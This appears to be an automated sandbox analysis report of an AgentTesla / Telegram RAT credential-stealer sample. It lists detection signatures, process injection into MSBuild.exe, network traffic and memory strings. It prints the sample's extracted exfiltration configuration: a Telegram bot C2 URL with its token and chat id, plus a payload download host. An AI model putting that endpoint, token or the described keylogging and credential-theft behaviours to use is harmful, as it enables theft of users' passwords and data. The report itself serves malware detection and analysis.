Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware2.17994.22795

Overview

General Information

Sample Name:	SecuriteInfo.com.W32.AIDetect.malware2.17994.22795 (renamed file extension from 22795 to exe)
Analysis ID:	475297
MD5:	074864aed555c328431042197f317b23
SHA1:	88578f80e1e81150e10582ca3dbd586cbc062277
SHA256:	a7ebedb978908d118423d5d542dfac659868feded8cc8b856a29cdef04d3c750
Tags:	AgentTeslaexe
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Telegram RAT

Yara detected AgentTesla

Installs a global keyboard hook

Maps a DLL or memory area into another process

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Uses the Telegram API (likely for C&C communication)

AutoIt script contains suspicious strings

Tries to steal Mail credentials (via file access)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Yara detected Credential Stealer

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Contains functionality to launch a program with higher privileges

Potential key logger detected (key state polling based)

Creates a window with clipboard capturing capabilities

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Contains functionality to retrieve information about pressed keystrokes

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.W32.AIDetect.malware2.17994.exe (PID: 4588 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe' MD5: 074864AED555C328431042197F317B23)

MSBuild.exe (PID: 2512 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe' MD5: D621FD77BD585874F9686D3A76462EF1)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1908206889:AAGLZ_7-FcFNV0_ZfJJC6AH7rI9MP-CHbsg/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1215222063", "Chat URL": "https://api.telegram.org/bot1908206889:AAGLZ_7-FcFNV0_ZfJJC6AH7rI9MP-CHbsg/sendDocument"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.261834638.0000000005170000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.261834638.0000000005170000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe PID: 4588	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: MSBuild.exe PID: 2512	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: MSBuild.exe PID: 2512	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: MSBuild.exe PID: 2512	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 4 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.2.SecuriteInfo.com.W32.AIDetect.malware2.17994.exe.5170000.1.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1215222063", "Chat URL": "https://api.telegram.org/bot1908206889:AAGLZ_7-FcFNV0_ZfJJC6AH7rI9MP-CHbsg/sendDocument"}
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe.4588.1.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1908206889:AAGLZ_7-FcFNV0_ZfJJC6AH7rI9MP-CHbsg/sendMessage"}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Virustotal: Detection: 22%

Perma Link

Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source: unknown	HTTPS traffic detected: 198.244.149.184:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.256550892.0000000005380000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.256550892.0000000005380000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_0041DD92 GetFileAttributesW,FindFirstFileW,FindClose,

1_2_0041DD92

Networking:

Uses the Telegram API (likely for C&C communication)

Show sources

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 198.244.149.184 198.244.149.184

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	String found in binary or memory: http://RTkMtc.com
Source: MSBuild.exe, 00000003.00000002.519935128.0000000002F90000.00000004.00000001.sdmp	String found in binary or memory: http://api.telegram.org
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstro
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypG
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdig2s1-1823.crl0
Source: MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/0
Source: MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/02
Source: MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/05
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/09
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: MSBuild.exe, 00000003.00000002.519694442.0000000002F36000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	String found in binary or memory: http://x1.i.lencr.orgr
Source: MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	String found in binary or memory: https://Dqy0Z3bHZCPneMObjrm.net
Source: MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%
Source: MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.261834638.0000000005170000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot1908206889:AAGLZ_7-FcFNV0_ZfJJC6AH7rI9MP-CHbsg/
Source: MSBuild.exe, 00000003.00000002.519694442.0000000002F36000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot1908206889:AAGLZ_7-FcFNV0_ZfJJC6AH7rI9MP-CHbsg/sendDocument
Source: MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot1908206889:AAGLZ_7-FcFNV0_ZfJJC6AH7rI9MP-CHbsg/sendDocumentdocument-----
Source: MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org4ol
Source: MSBuild.exe, 00000003.00000002.519935128.0000000002F90000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD8ol
Source: MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	String found in binary or memory: https://certs.godaddy.com/repository/0
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260969971.0000000000C5A000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260969971.0000000000C5A000.00000004.00000001.sdmp	String found in binary or memory: https://pomf.lain.la/
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260969971.0000000000C5A000.00000004.00000001.sdmp	String found in binary or memory: https://pomf.lain.la//950pn9
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251722526.0000000000CA4000.00000004.00000001.sdmp	String found in binary or memory: https://pomf.lain.la/f/950pn9
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	String found in binary or memory: https://pomf.lain.la/f/950pn9PPC:
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	String found in binary or memory: https://pomf.lain.la/f/950pn9iC:
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260348376.0000000000B5A000.00000004.00000020.sdmp	String found in binary or memory: https://pomf.lain.la/f/950pn9l
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260119604.00000000008F9000.00000004.00000001.sdmp	String found in binary or memory: https://pomf.lain.la/f/950pn9otddrgbqdnfturlmon.dllB
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260348376.0000000000B5A000.00000004.00000020.sdmp	String found in binary or memory: https://pomf.lain.la/f/950pn9uLA
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	String found in binary or memory: https://pomf.lain.la/f/950pn9v
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	String found in binary or memory: https://pomf.lain.la/z
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.261834638.0000000005170000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: pomf.lain.la

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_01C70095 LoadLibraryW,URLDownloadToFileW,CreateFileW,VirtualAlloc,ReadFile,VirtualAlloc,VirtualAlloc,und_memcpy,und_memcpy,

1_2_01C70095

Source: unknown	HTTPS traffic detected: 198.244.149.184:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_0046F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

1_2_0046F5D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_0041B736 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

1_2_0041B736

System Summary:

AutoIt script contains suspicious strings

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

AutoIt Script: ) , $F33JS1NFK2 ) DLLCALLADDRESS ($O31TOY7 (8530 + 4

Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046A8DC	1_2_0046A8DC
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_00420183	1_2_00420183
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0043599F	1_2_0043599F
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0042DA74	1_2_0042DA74
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0040DCD0	1_2_0040DCD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0042AC83	1_2_0042AC83
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_00408CA0	1_2_00408CA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0041AD5C	1_2_0041AD5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_00408530	1_2_00408530
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_00405D32	1_2_00405D32
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046F5D0	1_2_0046F5D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0040BDF0	1_2_0040BDF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0042BDF6	1_2_0042BDF6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_00406670	1_2_00406670
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_00413680	1_2_00413680
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_00434EBF	1_2_00434EBF
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_01C70095	1_2_01C70095
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_009EEC48	3_2_009EEC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_009E0040	3_2_009E0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_009E9870	3_2_009E9870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_009E39C8	3_2_009E39C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_009E6A58	3_2_009E6A58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_009ED128	3_2_009ED128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_009EABA8	3_2_009EABA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00ED47A0	3_2_00ED47A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00ED3CCC	3_2_00ED3CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00ED46B0	3_2_00ED46B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00ED5490	3_2_00ED5490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EDD5E0	3_2_00EDD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00ED3CC0	3_2_00ED3CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00F26160	3_2_00F26160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00F26898	3_2_00F26898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00F25B2B	3_2_00F25B2B

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_004029C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	1_2_004029C2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0041B845 NtdllDialogWndProc_W,	1_2_0041B845
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046F0A1 SendMessageW,NtdllDialogWndProc_W,	1_2_0046F0A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	1_2_0046F122
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046EA4E NtdllDialogWndProc_W,	1_2_0046EA4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	1_2_0046EAA6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_004702AA NtdllDialogWndProc_W,	1_2_004702AA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046F37C NtdllDialogWndProc_W,	1_2_0046F37C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046F3DA NtdllDialogWndProc_W,	1_2_0046F3DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046F3AB NtdllDialogWndProc_W,	1_2_0046F3AB
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046F45A ClientToScreen,NtdllDialogWndProc_W,	1_2_0046F45A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046F425 NtdllDialogWndProc_W,	1_2_0046F425
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0041AC99 NtdllDialogWndProc_W,	1_2_0041AC99
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	1_2_0046ECBC
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0041AD5C NtdllDialogWndProc_W,73C54310,NtdllDialogWndProc_W,	1_2_0041AD5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	1_2_0046F5D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046F594 GetWindowLongW,NtdllDialogWndProc_W,	1_2_0046F594
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046FE80 NtdllDialogWndProc_W,	1_2_0046FE80
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	1_2_0046FF04
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0041B7F2 NtdllDialogWndProc_W,	1_2_0041B7F2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	1_2_0046FF91
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0046EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	1_2_0046EFA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0041AFB4 GetParent,NtdllDialogWndProc_W,	1_2_0041AFB4

Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.253182193.000000000545F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.W32.AIDetect.malware2.17994.exe
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.261834638.0000000005170000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameKHMuKKvdGMIlvLpJDpVArknSIalZHTKaDvxP.exe4 vs SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Virustotal: Detection: 22%

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe'
